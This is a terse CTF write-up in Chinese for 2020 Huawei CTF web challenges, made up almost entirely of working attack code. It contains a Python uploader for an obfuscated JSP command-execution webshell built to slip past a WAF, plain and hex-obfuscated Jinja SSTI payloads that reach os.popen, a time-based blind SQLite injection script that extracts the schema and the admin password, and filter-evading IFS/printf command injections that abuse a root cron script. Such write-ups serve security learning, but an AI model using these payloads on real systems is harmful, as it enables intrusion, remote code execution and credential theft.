Skip to content

2020HuaweiCTF

webshell_1

用的云waf 很迷,加点混淆字符,传jsp🐎就过了

import requests
import random
import base64
req = requests.Session()
url = "http://124.70.221.177:31761/"
def generate_random_str(randomlength=64):
  random_str = ''
  base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
  length = len(base_str) - 1
  for i in range(randomlength):
    random_str += base_str[random.randint(0, length)]
  return random_str
def upload():
    payload = """<%
if("123".equals(request.getParameter("pwd"))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>"""
    uploadurl = url + "upload.jsp"
    exp = generate_random_str()+payload+generate_random_str()
    res = req.post(uploadurl,data=str(base64.b64encode(exp.encode('utf-8')),'utf-8'))
    print(str(base64.b64encode(exp.encode('utf-8')),'utf-8'))
    print(res.text.replace("\n",""))
    return res.text.replace("\n","")
def cat():
    res = req.get(url+upload())
    print(res.text.replace("\n", ""))
if __name__ == '__main__':
    while True:
        cat()

mine1_1

SSTI

绕就行

/success?msg={{(lipsum|attr(request.values.a)).get(request.values.b).get(request.values.c)(request.values.d).popen(request.values.e).read()}}&a=__globals__&b=__builtins__&c=__import__&d=os&e=cat%20flag.txt&f=123

mine2

再绕,构造

/success?msg={%print(""|attr("\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f")|attr("\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")(0)|attr("\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f")()|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")(202)|attr("\x5f\x5f\x69\x6e\x69\x74\x5f\x5f")|attr("\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")("\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")("eval")("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x70\x6f\x70\x65\x6e\x28\x27\x6c\x73\x20\x2d\x61\x6c\x6c\x27\x29\x2e\x72\x65\x61\x64\x28\x29"))%}

pyer

SQLite注入

import requests
import string
import time
url = "http://124.70.221.177:31229/login"
req = requests.Session()
str1 = string.ascii_letters+string.digits+string.printable+'!"#$%&\'()*+,-./:;<=>[email protected][\\]^_`{|}~'
str2 = string.printable
def version():
    text = ""
    for i in range(1,40):
        for j in str2:
            startTime = time.time()
            req.post(url,data={
                "username":"admin' || 1=(case when(substr(sqlite_version(),{},1)='{}') then randomblob(50000000) else 0 end) || '1".format(i,j),
                "password":"admin"
            })

            if time.time() - startTime > 5:
                text += j
                print(text)
                break
#  comment,users
def table():
    text = ""
    for i in range(1,40):
        for j in str2:
            startTime = time.time()
            payload = "admin' || 1=(case when(substr((SELECT group_concat(tbl_name) FROM sqlite_master WHERE type = 'table'),{},1)='{}') then randomblob(50000000) else 0 end) || '1".format(i,j)
            req.post(url,data={
                "username":payload,
                "password":"admin"
            })
            print(payload)
            if time.time() - startTime > 4:
                text += j
                print(text)
                break
# CREATE TABLE `comment` (
#   `Id` int(11) NOT NULL,
#   `username` varchar(255) DEFAULT NULL,
#   `comment` varchar(255) DEFAULT NULL,
#   PRIMARY KEY (`Id`)
# )
# CREATE TABLE `users` (
#   `Id` int(11) NOT NULL,
#   `username` varchar(255) DEFAULT NULL,
#   `password` varchar(255) DEFAULT NULL,
#   PRIMARY KEY (`Id`)
# )
def sql():
    text = ""
    for i in range(1,200):
        for j in str2:
            startTime = time.time()
            payload = "admin' || 1=(case when(substr((SELECT group_concat(sql) FROM sqlite_master WHERE type = 'table'),{},1)='{}') then randomblob(50000000) else 0 end) || '1".format(i,j)
            req.post(url,data={
                "username":payload,
                "password":"admin"
            })
            #print(payload)
            if time.time() - startTime > 4:
                text += j
                print(text)
                break
#sqlite_not_safe
def password():
    text = ""
    for i in range(1,200):
        for j in str2:
            startTime = time.time()
            payload = "admin' || 1=(case when(substr((SELECT group_concat(password) FROM users WHERE username='admin'),{},1)='{}') then randomblob(50000000) else 0 end) || '1".format(i,j)
            req.post(url,data={
                "username":payload,
                "password":"admin"
            })
            print(payload)
            if time.time() - startTime > 4:
                text += j
                print(text)
                break
if __name__ == '__main__':
    password()

拿到admin/sqlite_not_safe 登录后发现还有注入+模版注入

username=admin'union+select+'{{lipsum.__globals__.__builtins__.__import__("os").popen("cat flag.txt").read()}}'--%20&submit=%E7%99%BB%E9%99%86

hids

命令执行

ls -all / ls$IFS$(printf$IFS"\55\141\154\154")$IFS$(printf$IFS"\57")

cat ../../../../etc/crontab cat$IFS$(printf$IFS"\56\56\57\56\56\57\56\56\57\56\56\57\145\164\143\57\143\162\157\156\164\141\142")

利用crontab提权

echo "import os;os.system('chmod 777 /flag')">/detect.py

echo$IFS$(printf$IFS"\151\155\160\157\162\164\40\157\163\73\157\163\56\163\171\163\164\145\155\50\47\143\150\155\157\144\40\67\67\67\40\57\146\154\141\147\47\51")>$(printf$IFS"\57\144\145\164\145\143\164\56\160\171")

cat /detect.py

cat$IFS$(printf$IFS"\57\144\145\164\145\143\164\56\160\171") cat /flag

cat$IFS$(printf$IFS"\57\146\154\141\147")

cloud


Last update: 2021-04-25